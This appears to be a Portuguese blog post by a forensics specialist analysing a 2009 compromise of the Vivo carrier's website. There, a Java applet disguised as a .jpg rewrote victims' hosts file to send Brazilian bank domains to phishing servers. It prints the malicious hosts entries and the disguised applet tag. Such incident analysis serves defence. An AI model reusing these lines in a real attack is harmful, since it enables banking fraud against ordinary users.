Um código malicioso descoberto no código do site da operadora Vivo, por volta de 20:30 de ontem (08/09/2009), promovia alterações no computador de usuários que tentassem acessar o site. A partir de então, sempre que o usuário digitasse um site bancário, era direcionado a um host fantasma, com um site que falseava a identidade visual do Banco.

A falha era constatada quando usuários acessavam http://www.vivo.com.br/portal/home.php. Ao acessarem,  o site solicitava a Instalação de um Applet, software que é executado no contexto do Navegador (Browser). Após a execução, o código malicioso promovia uma alteração no arquivo hosts, localizado em \WINDOWS\system32\drivers\etc\hosts, inserindo o IP (Internet Protocol) do falso servidor a ser resolvido quando o usuário digitasse domínios de instituições bancárias:

69.162.114.180 santander.com.br
69.162.114.180 www.santander.com.br
69.162.114.181 itau.com.br
69.162.114.181 www.itau.com.br
69.162.114.181 www.itau.com
69.162.114.181 itau.com
69.162.114.181 itaupersonnalite.com.br
69.162.114.181 www.itaupersonnalite.com.br
69.162.114.182 www.bradesco.com.br
69.162.114.182 bradesco.com.br
69.162.114.182 www.bradesco.com
69.162.114.182 bradesco.com
69.162.114.182 www.bradescoempresa.com.br
69.162.114.182 bradescoempresa.com.br
69.162.114.182 www.bradescoprime.com.br
69.162.114.182 bradescoprime.com.br
69.162.114.182 bradescocartoes.com.br
69.162.114.182 www.bradescocartoes.com.br
69.162.114.179 www.nossacaixa.com.br
69.162.114.179 nossacaixa.com.br

Interessante técnica dos crackers foi forjar um arquivo Applet, normalmente .jar ou .class, e uma imagem com extensão .jpg, fazendo com que o aplicativo passasse despercebido como se fosse  uma “imagem”, enganando métodos superficiais de análise de código, vejamos:

<applet code=”laa.class” archive=”http://www.vivo.com.br/portal/co/logo_top.jpg” width=”0″ height=”0″><param value=”"></applet>

Porém, ao ser baixado o arquivo supostamente “.jpg”, em uma análise forense detalhada, descompactando-o, era possível identificar outros arquivos dependentes, dentre os quais um arquivo classe “laa.class”. Ao editá-lo, era possível visualizar as chamadas para o servidor falso contendo sites bancários.

Tentamos baixar o arquivo e sequer precisamos de conhecimentos avançados para detecção do malware, já que o simples anti-virus do host que usávamos já disparou o alerta:

Ao que parece a Vivo corrigiu a falha em aproximadamente uma hora após o descobrimento. Não se tem informações de quantos usuários tiveram os computadores alterados. Recomendamos a usuários que acessaram e executaram o Applet que verifiquem o Arquivo “hosts” de suas máquinas, a fim de identificar eventual inserção indevida, através de um especialista.

Fontes e referências: http://osysadmin.blogspot.com/2009/09/site-da-vivo-comprometido.html

José Antonio Milagre

http://www.twitter.com/periciadigital

Pesquisador em Cyber Cultura, Perito em Crimes Eletrônicos na LegalTECH, Mantenedor do Blog Perícia Digital www.legaltech.com.br/periciadigital, Advogado especialista em Direito Digital, MBA em Gestão de Tecnologia da Informação, Professor de Pós-Graduação na Universidade Presbiteriana Mackenzie, SENAC e UNIGRAN. Co-autor do livro “Internet: O Encontro de 2 Mundos” pela Editora Brasport, 2008. Colaborador no Livro “Legislação Criminal Especial”, organizado pelo Professor Luiz Flávio Gomes, Editora RT, 2009.